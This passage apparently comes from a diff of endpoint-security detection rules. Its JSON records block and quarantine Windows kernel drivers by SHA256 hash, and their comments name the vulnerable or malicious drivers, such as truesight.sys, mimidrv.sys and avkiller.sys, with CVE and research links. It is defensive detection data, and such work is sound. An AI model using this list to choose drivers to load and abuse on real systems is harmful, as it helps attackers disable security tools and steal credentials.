"hl_testing_start_time": "2026-03-23T11:45:30.821256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47c490cc83a17ff36a1a92e08d63e76edffba49c9577865315a6c9be6ba80a7d", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4c0f9b6-b140-5b80-a787-c011912f0856", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469398Z", + "creation_date": "2026-03-23T11:45:30.469401Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469410Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "284bf9b08be5d4fd4b10fda6736cf490c66f9adace013c19be2e31cf74bfc5e9", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4c3068d-65c9-5ae3-90da-20efe06e93b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500388Z", + "creation_date": "2026-03-23T11:45:31.500391Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500400Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2439616f5ab33d4a8b6d09e17295a10b61f50081be7c6ea958061f849283de38", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4e09588-12f8-570f-9b86-59e51c8975ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832097Z", + "creation_date": "2026-03-23T11:45:30.832099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9449b1ed5585f43c4a00d876ea076d86226a5496807ef4e75c4709e4ccfc3dfb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4e4ab18-248f-5d94-becd-16aba6035928", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820425Z", + "creation_date": "2026-03-23T11:45:30.820427Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820433Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8fe429c46fedbab8f06e5396056adabbb84a31efef7f9523eb745fc60144db65", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4e8f9d6-5335-5fb1-acaf-1ac39320553e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458693Z", + "creation_date": "2026-03-23T11:45:30.458696Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cdcf71696db4031fe3e70969bbe6169744ff91eebb24d6ffb734f922a850183b", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a4fd2091-4588-5078-ba6b-24bcd7fe2221", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825768Z", + "creation_date": "2026-03-23T11:45:31.825770Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c19b55ff88c487dd0cb2cd4087496f611c9df7287ecfeedd9137eef619725fdc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a508712e-8def-598e-8741-23b4ab40866b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614385Z", + "creation_date": "2026-03-23T11:45:29.614387Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614392Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "131d5490ceb9a5b2324d8e927fea5becfc633015661de2f4c2f2375a3a3b64c6", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a516abbf-f5f0-5ffc-801e-02e92abac2ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824611Z", + "creation_date": "2026-03-23T11:45:31.824613Z", 
+ "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824618Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6253fa6ad371e218a9c08c42781fe95ec32be8a176a6a7231c3a1b7cd2841f6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5182727-1449-5a08-968a-d7bc504bce61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142489Z", + "creation_date": "2026-03-23T11:45:31.142491Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43025fdd42bcc3f0dc50589aed1d8a0650515ea8150886487c7fb5b927d269cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"a51a536a-3475-5b37-bd5d-765ca11efa36", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497689Z", + "creation_date": "2026-03-23T11:45:31.497692Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497697Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23423b17aa2fed6d0c15a2def325c38c86403349d8ff0b539777c6bbcafcf865", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5367ad2-b0ee-5497-8432-fe0190503a7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819813Z", + "creation_date": "2026-03-23T11:45:31.819816Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.819825Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63a0eb941b89c6b98885b3a2db9d6b21511c813fd065502f182e6b74d87f4b71", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a547d991-c8c7-5c7f-9c2d-b2a8d85a85d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611445Z", + "creation_date": "2026-03-23T11:45:29.611447Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d3ed9427dcc4f79be3585d41ab9c0bb447d6a0258dd919c4d49e02dedbaa47b", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5534782-f0a0-5abb-a532-8c58c055fcb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829716Z", + "creation_date": "2026-03-23T11:45:30.829718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829724Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6e9037c7882b36352b507a386a23c71e46a7d8bdec78b0c5cdd3a087b217501", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5547094-c3f0-5c32-8fa1-dc27bea34e53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823206Z", + "creation_date": "2026-03-23T11:45:31.823209Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "ba4ac170deb3dcd0ece289932d02c637d2e5e2d59dae5f08c9f115e7416b0905", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a583ef46-b68f-56b8-aa83-71efa6f02bfb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473031Z", + "creation_date": "2026-03-23T11:45:31.473035Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473043Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6dfcd8e56c13bd0824c968f52d37f2d737ada3ddb158c8405202cb07e963eef5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a586ed20-1152-5cab-970f-9abca2b79dc5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972925Z", + "creation_date": "2026-03-23T11:45:29.972927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2fbbc276737047cb9b3ba5396756d28c1737342d89dce1b64c23a9c4513ae445", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a58dccbd-e6b7-5a59-8b24-056946e3691b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813169Z", + "creation_date": "2026-03-23T11:45:31.813172Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813180Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a651ebf69a83d8ef85cdbe17b5a0bee94d30d52646ad935ecc5241641d8af16", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a592fa98-89fe-5cca-9fe6-9c5fa046d225", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816524Z", + "creation_date": "2026-03-23T11:45:31.816527Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816535Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7bf9a7577b10d3a5fa76272aaf3514c70f7a1273b2e3380524138cea2b478fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a59ad06d-30f1-5586-89ff-1978cac2644f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:32.145844Z", + "creation_date": "2026-03-23T11:45:32.145847Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145852Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6cb163089f665c05d607a465f1b6272cdd5c949772ab9ce7227120cf61f971a", + "comment": "Malicious Kernel Driver (aka avkiller.sys) [https://www.loldrivers.io/drivers/7a9d34e4-c660-4388-ab61-4fd6f6bf1ad4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a59baf5f-a9d0-528c-a9fb-6251e3a3c8e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487144Z", + "creation_date": "2026-03-23T11:45:31.487146Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487152Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "465db36e6ebb2674c666028ae6a84d545c215c84db0934a830f152e84f147339", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" 
+} +{ + "id": "a5a64c9d-9180-58eb-8a88-03903d4ed730", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609937Z", + "creation_date": "2026-03-23T11:45:29.609939Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609951Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "92ca1aec3afc90b44861c2e0be084a3db38d22d52f35e1697643d6477151392f", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5a8e4af-2f4f-5999-b4cc-58e4cb54d464", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828955Z", + "creation_date": "2026-03-23T11:45:30.828957Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.828963Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "668fb6e2568126a60f21bbe063e35ef824fdbcd7551cd32076181cda71727909", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5ab5005-0036-5709-8267-13807e73416f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812783Z", + "creation_date": "2026-03-23T11:45:31.812787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812796Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f5e68a95d3c4d654cb4a66067506baaf66470ecb425fbf137bfa4b765e79da6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5b568ca-d0ba-51a2-bf9a-731d7f6d4fbe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481518Z", + "creation_date": "2026-03-23T11:45:31.481522Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481532Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a200f489bb41c22e69eb1ef4fdedb0142aebad4b7be1c2f7bee9792fa7d217a5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5cd8675-4a66-5df6-936d-6d86875bec1f", + 